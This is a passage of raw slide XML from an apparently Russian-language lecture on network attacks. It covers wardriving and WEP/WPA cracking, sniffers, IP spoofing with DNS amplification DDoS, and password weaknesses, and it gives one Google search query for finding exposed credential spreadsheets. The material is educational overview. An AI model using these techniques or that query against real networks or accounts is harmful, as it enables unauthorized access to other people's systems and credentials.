                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>вардрайвинг</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> - поиск уязвимых беспроводных сетей, взлом(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, WPA1)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> подбор паролей</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(WPA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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спутниковая рыбалка</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Программы:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – есть для всех ОС, имеет графический интерфейс, использует </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Pcap</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>tcpdump – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>в *</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>nix-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>системах</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Библиотека </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Pcap (Packet Capture)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Text Box 3"/>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64767113-B8CC-45C2-9DAF-C616D7F97326}"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4"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en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>спуфинг</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="5141520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>спуфинг</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>– подмена </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>адреса</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>отправителя </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Часто используется в </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DDoS-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>атаках: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="360000" indent="-216000" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45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en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Злоумышленник отправляет запрос к открытому серверу (например, DNS-резолверу) с поддельным IP-адресом жертвы в поле источника</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="360000" indent="-216000" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45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en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сервер отвечает на запрос, отправляя гораздо больше данных, чем получил</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="360000" indent="-216000" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45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en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ответ приходит на IP-адрес жертвы, перегружая её канал или сервер</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Text Box 3"/>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303AF243-0BFB-4131-BDDB-530603A31C15}"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7"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Аутентификация</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142920" y="1500120"/>
            <a:ext cx="8998920" cy="5355720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Перехват ключа/пароля</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Многие стандартные протоколы интернета не шифруют пароль при передаче, например, стандартная аутентификация на веб-сервере; аутентификация на прокси-сервере; форумы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Подбор </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Программы подбора паролей к </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>FTP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>серверам, к почтовым серверам, к соцсетям и т.п. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>слабые пароли - перебор 365 дней рождений</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>online WPA Cracker</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Недостаточная аутентификация</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>по </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>адресу</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>отсутствие аутентификации: использование «скрытых» </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>адресов; трансляция видео с камер слежения</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>использование необратимых хеш-функций без соли для преобразования пароля (радужные таблицы)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Text Box 3"/>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F4694262-4D90-4756-8B67-F33E532DEA16}"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0"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Атака с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>username password filetype:xls</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Среди нескольких первых ссылок можно обнаружить, например, набор паролей доступа к полнотекстовым базам данных статей</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Text Box 3"/>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DBA4DDBE-A316-4D45-9D8E-5F587669A20A}"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nodeType="clickEffect" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="4" nodeType="withEffect" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5" nodeType="clickEffect" fill="hold" presetClass="entr" presetID="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="351">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
